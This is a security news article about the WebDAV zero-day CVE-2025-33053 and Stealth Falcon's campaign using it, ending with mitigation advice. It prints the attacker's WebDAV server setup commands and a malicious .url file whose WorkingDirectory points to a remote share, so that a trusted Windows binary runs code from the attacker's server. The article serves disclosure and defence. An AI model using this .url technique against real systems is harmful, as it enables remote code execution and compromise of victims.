WebDAV Remote Code Execution 0-Day Actively Exploited — PoC Released

A critical zero-day vulnerability in Microsoft’s Web Distributed Authoring and Versioning (WebDAV) protocol, tracked as CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon since March 2025.

The flaw, patched in June’s Patch Tuesday, enables remote code execution (RCE) via manipulated .url shortcut files and has been linked to attacks against Middle Eastern defense sectors.

Vulnerability Overview

According to the report, CVE-2025-33053 (CVSS 8.8) allows attackers to hijack the working directory of legitimate Windows tools like iediagcmd.exe, forcing them to execute malicious payloads from attacker-controlled WebDAV servers.

Key details:

Component	Details
Affected Systems	Windows 10/11, Server 2016–2025, and legacy unsupported versions
Exploit Mechanism	Abuse of WebDAV’s UNC path handling to redirect WorkingDirectory
Initial Vector	Phishing emails with .url files masquerading as PDFs
Primary Payload	Horus Agent (Mythic framework-based implant with anti-analysis techniques)

Technical Breakdown of the Exploit

The attack chain leverages a multi-stage process:

1. WebDAV Server Deployment

Attackers use scripts like setup_webdav.sh to configure Apache2 servers with WebDAV modules:

bash# Apache WebDAV configuration snippet  
sudo a2enmod dav  
sudo a2enmod dav_fs  
mkdir /var/www/webdav  
chown -R www-data:www-data /var/www/webdav  
echo "<Directory /var/www/webdav>\nDAV On\n</Directory>" >> /etc/apache2/sites-available/000-default.conf  
systemctl restart apache2  

This creates a WebDAV endpoint at http://<attacker-ip>/webdav for hosting malicious executables.

2. Malicious .url File Generation

The gen_url.py script crafts .url files that abuse Windows’ file execution order:

python# Example .url file generation command  
python3 gen_url.py --ip 192.168.1.100 --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" --out payload.url  

Resulting in:

text[InternetShortcut]  
URL=C:\Program Files\Internet Explorer\iediagcmd.exe  
WorkingDirectory=\\192.168.1.100\webdav\  
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  

When opened, iediagcmd.exe executes route.exe from the attacker’s WebDAV server instead of C:\Windows\System32.

Attack Chain and Payload Analysis

Stealth Falcon’s campaign follows a sophisticated workflow:

1. Initial Access: Phishing email with a ZIP archive containing the malicious .url file.
2. Exploitation: The .url file sets WorkingDirectory to a WebDAV path, triggering DLL hijacking or direct executable sideloading.
3. Payload Delivery: Horus Loader (C++-based) decrypts a decoy PDF while injecting the Horus Agent into msedge.exe using NtResumeThread system calls .
4. Persistence: The agent employs AES-encrypted C2 communication over HTTP, with HMAC-SHA256 integrity checks.

Anti-Analysis Techniques:

• Process hollowing of legitimate binaries.
• Manual mapping of kernel32.dll to evade API hooks.
• Checks for 100+ antivirus processes across 17 vendors.

Mitigation and Response

Microsoft’s patch (KB5034553) modifies WebDAV’s handling of working directories. Organizations should:

• Apply June 2025 Windows updates immediately.
• Block .url files in email attachments via Group Policy.
• Monitor for suspicious WebDAV connections (e.g., \$$external-IP]\webdav).

Legacy systems no longer receiving updates (e.g., Windows 7) remain vulnerable, necessitating network segmentation or WebDAV protocol blocking.

CVE-2025-33053 highlights the risks of deprecated protocols like WebDAV and the evolving tradecraft of APT groups.

By repurposing Windows utilities and leveraging living-off-the-land binaries (LOLBins), Stealth Falcon demonstrates how low-level protocol flaws can bypass modern defenses.

Continuous patch management and user awareness training remain critical in mitigating such threats.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates